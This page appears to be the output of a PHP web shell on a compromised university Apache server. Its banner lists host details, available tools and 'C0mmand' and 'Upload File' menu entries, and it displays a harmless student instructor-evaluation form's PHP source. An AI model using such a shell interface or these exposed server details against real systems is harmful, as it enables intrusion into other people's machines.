Server IP : 172.16.15.8 / Your IP : 18.118.137.96 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/inieves/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- evalFormA.php --> <?php session_start(); $na = $_POST['nombre']; $co = $_POST['course']; $_SESSION['n'] = $na; $_SESSION['c'] = $co; ?> <HTML> <BODY STYLE="background-color:black; color:gold; font-family:algerian;"> <CENTER> <H2 style="color:gold; font-size:200% border:2px; border-style:solid; border-color:gold;"> Instructor evaluation </H2> <P> <FORM action = evalFormB.php method = post> Question #1: Did the instructor hurt your feelings? <P> <INPUT type=radio name=q1 value=QA > Strongly Agree <INPUT type=radio name=q1 value=QB > Agree <INPUT type=radio name=q1 value=QC > Disagree <P> <P> <P> <P> Question #2: Did the instructor use strong language against you? <P> <INPUT type=radio name=q2 value=QA > Strongly Agree <INPUT type=radio name=q2 value=QB > Agree <INPUT type=radio name=q2 value=QC > Disagree <P> <P> <P> <P> <INPUT type=submit value="Submit Form"> <INPUT type=reset value="Reset Form"> </FORM> </CENTER> </BODY> </HTML>